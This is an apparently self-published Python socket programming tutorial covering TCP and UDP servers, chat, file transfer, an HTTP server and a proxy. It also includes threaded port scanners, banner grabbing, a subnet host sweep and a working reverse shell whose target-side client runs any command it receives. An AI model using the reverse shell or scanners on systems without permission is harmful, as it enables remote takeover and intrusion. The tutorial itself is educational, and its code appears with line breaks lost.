2117 words
11 minutes
Python Socket Programming - Complete Guide
π Python Socket Programming - Complete Guide

π Table of Contents
- What are Sockets?
- Socket Basics
- TCP vs UDP
- Creating a TCP Server
- Creating a TCP Client
- UDP Server and Client
- Port Scanner
- Chat Application
- File Transfer
- Reverse Shell
- HTTP Server
- Socket Options
- Non-blocking Sockets
- Multi-threaded Server
- Practical Projects
1. What are Sockets?

Sockets are endpoints for sending and receiving data across a network.
Think of it like a phone call:
- Server = Person waiting for calls
- Client = Person making the call
- Socket = The phone
- Port = Phone number
Why Learn Sockets?
- β Build network tools
- β Create chat applications
- β Make port scanners
- β Understand how internet works
- β Security testing & hacking
2. Socket Basics
Import the Module
import socketCreate a Socket
# TCP Socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# UDP Socketsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)Parameters Explained
| Parameter | Meaning |
|---|---|
AF_INET | IPv4 addresses |
AF_INET6 | IPv6 addresses |
SOCK_STREAM | TCP (reliable) |
SOCK_DGRAM | UDP (fast) |
Basic Methods
# Server methodssock.bind((host, port)) # Attach to addresssock.listen(5) # Start listeningsock.accept() # Accept connection
# Client methodssock.connect((host, port)) # Connect to server
# Bothsock.send(data) # Send datasock.recv(1024) # Receive datasock.close() # Close socketGet Your IP Address
import socket
# Get hostnamehostname = socket.gethostname()print(f"Hostname: {hostname}")
# Get IP addressip = socket.gethostbyname(hostname)print(f"IP Address: {ip}")
# Get IP from domaingoogle_ip = socket.gethostbyname("google.com")print(f"Google IP: {google_ip}")3. TCP vs UDP

TCP (Transmission Control Protocol)
- β Reliable - guarantees delivery
- β Ordered - data arrives in sequence
- β Connection-based
- β Slower
- Use for: Web, Email, File transfer
UDP (User Datagram Protocol)
- β Fast
- β No connection needed
- β No guarantee of delivery
- β No order guarantee
- Use for: Gaming, Streaming, DNS
4. Creating a TCP Server

Simple TCP Server
import socket
# Create socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow reuse of addressserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to addressHOST = "0.0.0.0" # Listen on all interfacesPORT = 9999
server.bind((HOST, PORT))
# Start listening (max 5 queued connections)server.listen(5)print(f"[*] Server listening on {HOST}:{PORT}")
# Accept connectionswhile True: client_socket, client_address = server.accept() print(f"[+] Connection from {client_address}")
# Receive data data = client_socket.recv(1024) print(f"[*] Received: {data.decode()}")
# Send response response = "Message received!" client_socket.send(response.encode())
# Close connection client_socket.close()Server with Multiple Messages
import socket
def start_server(host="0.0.0.0", port=9999): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((host, port)) server.listen(5)
print(f"[*] Server started on {host}:{port}")
while True: client, addr = server.accept() print(f"[+] {addr} connected")
# Keep connection open while True: try: data = client.recv(1024) if not data: break
message = data.decode().strip() print(f"[{addr}] {message}")
# Echo back client.send(f"Echo: {message}\n".encode())
if message.lower() == "quit": break
except ConnectionResetError: break
print(f"[-] {addr} disconnected") client.close()
if __name__ == "__main__": start_server()5. Creating a TCP Client
Simple TCP Client
import socket
# Create socketclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to serverHOST = "127.0.0.1"PORT = 9999
client.connect((HOST, PORT))print(f"[*] Connected to {HOST}:{PORT}")
# Send datamessage = "Hello, Server!"client.send(message.encode())
# Receive responseresponse = client.recv(1024)print(f"[*] Response: {response.decode()}")
# Close connectionclient.close()Interactive Client
import socket
def start_client(host="127.0.0.1", port=9999): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try: client.connect((host, port)) print(f"[*] Connected to {host}:{port}") print("[*] Type 'quit' to exit\n")
while True: # Get user input message = input("You: ")
if not message: continue
# Send message client.send(message.encode())
if message.lower() == "quit": break
# Receive response response = client.recv(1024) print(f"Server: {response.decode()}")
except ConnectionRefusedError: print("[!] Connection refused. Is the server running?") finally: client.close() print("[*] Disconnected")
if __name__ == "__main__": start_client()6. UDP Server and Client
UDP Server
import socket
# Create UDP socketserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "0.0.0.0"PORT = 9999
server.bind((HOST, PORT))print(f"[*] UDP Server listening on {HOST}:{PORT}")
while True: # Receive data and address data, addr = server.recvfrom(1024) print(f"[{addr}] {data.decode()}")
# Send response response = f"Received: {data.decode()}" server.sendto(response.encode(), addr)UDP Client
import socket
# Create UDP socketclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "127.0.0.1"PORT = 9999
# Send data (no connection needed!)message = "Hello UDP Server!"client.sendto(message.encode(), (HOST, PORT))
# Receive responsedata, server = client.recvfrom(1024)print(f"Response: {data.decode()}")
client.close()7. Port Scanner

Simple Port Scanner
import socket
def scan_port(host, port): """Check if a port is open""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) # 1 second timeout
result = sock.connect_ex((host, port)) sock.close()
return result == 0 # True if open
# Scan common portstarget = "127.0.0.1"common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389, 8080]
print(f"Scanning {target}...")
for port in common_ports: if scan_port(target, port): print(f"[+] Port {port}: OPEN")Advanced Port Scanner with Threads
import socketimport threadingfrom queue import Queue
# Thread-safe printprint_lock = threading.Lock()
def scan_port(host, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5)
result = sock.connect_ex((host, port)) sock.close()
if result == 0: with print_lock: try: service = socket.getservbyport(port) except: service = "unknown" print(f"[+] Port {port:5} OPEN ({service})")
def worker(host, port_queue): while True: port = port_queue.get() scan_port(host, port) port_queue.task_done()
def port_scanner(host, start_port=1, end_port=1024, threads=100): print(f"\n{'='*50}") print(f"Scanning {host}") print(f"Ports: {start_port} - {end_port}") print(f"{'='*50}\n")
# Create queue port_queue = Queue()
# Start threads for _ in range(threads): t = threading.Thread(target=worker, args=(host, port_queue)) t.daemon = True t.start()
# Add ports to queue for port in range(start_port, end_port + 1): port_queue.put(port)
# Wait for completion port_queue.join() print(f"\n{'='*50}") print("Scan complete!")
if __name__ == "__main__": target = input("Enter target IP: ") port_scanner(target, 1, 1024)Banner Grabbing Scanner
import socket
def grab_banner(host, port): """Get service banner""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) sock.connect((host, port))
# Send empty request for some services sock.send(b"HEAD / HTTP/1.1\r\n\r\n")
banner = sock.recv(1024).decode().strip() sock.close() return banner except: return None
# Scan and grab bannerstarget = "127.0.0.1"ports = [21, 22, 80, 443]
for port in ports: banner = grab_banner(target, port) if banner: print(f"Port {port}:") print(f" {banner[:100]}...") print()8. Chat Application
Chat Server
import socketimport threading
clients = []nicknames = []
def broadcast(message): """Send message to all clients""" for client in clients: try: client.send(message) except: remove_client(client)
def remove_client(client): """Remove disconnected client""" if client in clients: index = clients.index(client) clients.remove(client) nickname = nicknames[index] nicknames.remove(nickname) broadcast(f"[SERVER] {nickname} left the chat!".encode())
def handle_client(client): """Handle individual client""" while True: try: message = client.recv(1024) if message: broadcast(message) else: remove_client(client) break except: remove_client(client) break
def start_server(): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(("0.0.0.0", 9999)) server.listen(10)
print("[*] Chat Server started on port 9999")
while True: client, address = server.accept() print(f"[+] {address} connected")
# Get nickname client.send("NICK".encode()) nickname = client.recv(1024).decode()
nicknames.append(nickname) clients.append(client)
print(f"[*] Nickname: {nickname}") broadcast(f"[SERVER] {nickname} joined the chat!".encode()) client.send("[SERVER] Connected to chat!".encode())
# Start thread for client thread = threading.Thread(target=handle_client, args=(client,)) thread.start()
if __name__ == "__main__": start_server()Chat Client
import socketimport threading
nickname = input("Enter nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client.connect(("127.0.0.1", 9999))
def receive(): """Receive messages""" while True: try: message = client.recv(1024).decode() if message == "NICK": client.send(nickname.encode()) else: print(message) except: print("[!] Connection lost!") client.close() break
def write(): """Send messages""" while True: message = input("") if message.lower() == "/quit": client.close() break client.send(f"[{nickname}] {message}".encode())
# Start threadsreceive_thread = threading.Thread(target=receive)receive_thread.start()
write_thread = threading.Thread(target=write)write_thread.start()9. File Transfer
File Server (Sender)
import socketimport os
def send_file(filename, host="0.0.0.0", port=9999): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((host, port)) server.listen(1)
print(f"[*] Waiting for connection on port {port}...")
client, addr = server.accept() print(f"[+] {addr} connected")
# Send filename client.send(filename.encode())
# Wait for acknowledgment client.recv(1024)
# Send file size filesize = os.path.getsize(filename) client.send(str(filesize).encode())
# Wait for acknowledgment client.recv(1024)
# Send file with open(filename, "rb") as f: bytes_sent = 0 while bytes_sent < filesize: data = f.read(4096) client.send(data) bytes_sent += len(data) print(f"\r[*] Sent: {bytes_sent}/{filesize} bytes", end="")
print(f"\n[+] File sent successfully!") client.close() server.close()
if __name__ == "__main__": send_file("test.txt")File Client (Receiver)
import socket
def receive_file(host="127.0.0.1", port=9999): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host, port))
print(f"[*] Connected to {host}:{port}")
# Receive filename filename = client.recv(1024).decode() print(f"[*] Receiving: {filename}") client.send(b"OK")
# Receive file size filesize = int(client.recv(1024).decode()) print(f"[*] File size: {filesize} bytes") client.send(b"OK")
# Receive file with open(f"received_{filename}", "wb") as f: bytes_received = 0 while bytes_received < filesize: data = client.recv(4096) f.write(data) bytes_received += len(data) print(f"\r[*] Received: {bytes_received}/{filesize} bytes", end="")
print(f"\n[+] File saved as: received_{filename}") client.close()
if __name__ == "__main__": receive_file()10. Reverse Shell
β οΈ WARNING: For educational purposes only! Only use on systems you own or have permission to test.
Reverse Shell Server (Attacker)
import socket
def start_listener(host="0.0.0.0", port=4444): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((host, port)) server.listen(1)
print(f"[*] Listening on {host}:{port}")
client, addr = server.accept() print(f"[+] Connection from {addr}")
while True: command = input("Shell> ")
if command.lower() == "exit": client.send(b"exit") break
if not command: continue
client.send(command.encode())
response = client.recv(65535).decode() print(response)
client.close() server.close()
if __name__ == "__main__": start_listener()Reverse Shell Client (Target)
import socketimport subprocessimport os
def connect_back(host="127.0.0.1", port=4444): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host, port))
while True: command = client.recv(1024).decode()
if command.lower() == "exit": break
# Handle cd command if command.startswith("cd "): try: os.chdir(command[3:]) output = f"Changed to: {os.getcwd()}" except: output = "Directory not found" else: # Execute command try: output = subprocess.check_output( command, shell=True, stderr=subprocess.STDOUT ).decode() except Exception as e: output = str(e)
if not output: output = "Command executed (no output)"
client.send(output.encode())
client.close()
if __name__ == "__main__": connect_back()11. HTTP Server
Simple HTTP Server
import socket
def http_server(host="0.0.0.0", port=8080): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((host, port)) server.listen(5)
print(f"[*] HTTP Server running on http://{host}:{port}")
while True: client, addr = server.accept()
# Receive request request = client.recv(4096).decode()
# Parse request if request: method = request.split()[0] path = request.split()[1] print(f"[{addr[0]}] {method} {path}")
# Create response html = """<!DOCTYPE html><html><head><title>Python HTTP Server</title></head><body> <h1>Hello from Python!</h1> <p>You requested: {}</p></body></html>""".format(path)
response = f"""HTTP/1.1 200 OKContent-Type: text/htmlContent-Length: {len(html)}Connection: close
{html}"""
client.send(response.encode())
client.close()
if __name__ == "__main__": http_server()12. Socket Options
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Reuse address (avoid "Address already in use")sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Set timeout (seconds)sock.settimeout(5.0)
# Keep connection alivesock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# Set buffer sizessock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 8192) # Receive buffersock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 8192) # Send buffer
# Disable Nagle's algorithm (send immediately)sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Get option valuevalue = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)print(f"Receive buffer size: {value}")13. Non-blocking Sockets
Using select()
import socketimport select
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)server.setblocking(False)server.bind(("0.0.0.0", 9999))server.listen(5)
sockets_list = [server]clients = {}
print("[*] Non-blocking server started")
while True: # Wait for activity on any socket read_sockets, _, exception_sockets = select.select( sockets_list, [], sockets_list )
for sock in read_sockets: # New connection if sock == server: client, addr = server.accept() client.setblocking(False) sockets_list.append(client) clients[client] = addr print(f"[+] {addr} connected")
# Message from client else: try: data = sock.recv(1024) if data: print(f"[{clients[sock]}] {data.decode()}") # Broadcast to others for client in clients: if client != sock: client.send(data) else: # Client disconnected print(f"[-] {clients[sock]} disconnected") sockets_list.remove(sock) del clients[sock] except: continue
# Handle exceptions for sock in exception_sockets: sockets_list.remove(sock) del clients[sock]14. Multi-threaded Server
import socketimport threading
class ClientThread(threading.Thread): def __init__(self, client_socket, client_address): threading.Thread.__init__(self) self.client = client_socket self.address = client_address
def run(self): print(f"[+] Thread started for {self.address}")
while True: try: data = self.client.recv(1024) if not data: break
message = data.decode() print(f"[{self.address}] {message}")
# Echo back self.client.send(f"Echo: {message}".encode())
except ConnectionResetError: break
print(f"[-] {self.address} disconnected") self.client.close()
def main(): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(("0.0.0.0", 9999)) server.listen(10)
print("[*] Multi-threaded server started on port 9999")
while True: client, addr = server.accept() thread = ClientThread(client, addr) thread.start()
if __name__ == "__main__": main()15. Practical Projects
Project 1: Network Discovery Tool
import socketimport threadingfrom queue import Queue
def scan_host(ip): """Check if host is alive""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) result = sock.connect_ex((ip, 80)) sock.close()
if result == 0: try: hostname = socket.gethostbyaddr(ip)[0] except: hostname = "Unknown" print(f"[+] {ip:15} - ALIVE ({hostname})")
def network_scan(network="192.168.1"): """Scan entire network""" print(f"[*] Scanning {network}.0/24\n")
threads = [] for i in range(1, 255): ip = f"{network}.{i}" t = threading.Thread(target=scan_host, args=(ip,)) threads.append(t) t.start()
for t in threads: t.join()
if __name__ == "__main__": network_scan("192.168.1")Project 2: DNS Lookup Tool
import socket
def dns_lookup(domain): """Perform DNS lookup""" print(f"\n[*] DNS Lookup for: {domain}\n")
# A Record (IPv4) try: ipv4 = socket.gethostbyname(domain) print(f"IPv4 (A): {ipv4}") except: print("IPv4: Not found")
# All addresses try: results = socket.getaddrinfo(domain, None)
ipv4_addrs = set() ipv6_addrs = set()
for result in results: family = result[0] addr = result[4][0]
if family == socket.AF_INET: ipv4_addrs.add(addr) elif family == socket.AF_INET6: ipv6_addrs.add(addr)
print(f"\nAll IPv4 addresses:") for addr in ipv4_addrs: print(f" - {addr}")
print(f"\nAll IPv6 addresses:") for addr in ipv6_addrs: print(f" - {addr}")
except socket.gaierror as e: print(f"Error: {e}")
# Testdns_lookup("google.com")dns_lookup("github.com")Project 3: Simple Proxy Server
import socketimport threading
def handle_client(client_socket): """Forward requests to destination""" # Receive request from client request = client_socket.recv(4096)
# Parse the first line to get host first_line = request.split(b'\n')[0] url = first_line.split()[1]
# Extract host and port http_pos = url.find(b"://") if http_pos != -1: url = url[http_pos + 3:]
port_pos = url.find(b":") host_pos = url.find(b"/")
if host_pos == -1: host_pos = len(url)
if port_pos == -1 or port_pos > host_pos: port = 80 host = url[:host_pos] else: port = int(url[port_pos + 1:host_pos]) host = url[:port_pos]
# Connect to destination try: dest = socket.socket(socket.AF_INET, socket.SOCK_STREAM) dest.connect((host.decode(), port)) dest.send(request)
while True: data = dest.recv(4096) if len(data) > 0: client_socket.send(data) else: break
dest.close() except Exception as e: print(f"Error: {e}")
client_socket.close()
def proxy_server(host="0.0.0.0", port=8888): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((host, port)) server.listen(10)
print(f"[*] Proxy server running on {host}:{port}")
while True: client, addr = server.accept() print(f"[+] Request from {addr}") thread = threading.Thread(target=handle_client, args=(client,)) thread.start()
if __name__ == "__main__": proxy_server()π― Quick Reference
| Function | Description |
|---|---|
socket() | Create a socket |
bind() | Bind to address |
listen() | Start listening |
accept() | Accept connection |
connect() | Connect to server |
send() | Send data |
recv() | Receive data |
close() | Close socket |
settimeout() | Set timeout |
gethostname() | Get local hostname |
gethostbyname() | Resolve hostname |
π Youβre Now a Socket Master!
Practice by building:
- Port scanners
- Chat applications
- File transfer tools
- Network utilities
- Security tools
Created by cat0x01 π₯·π»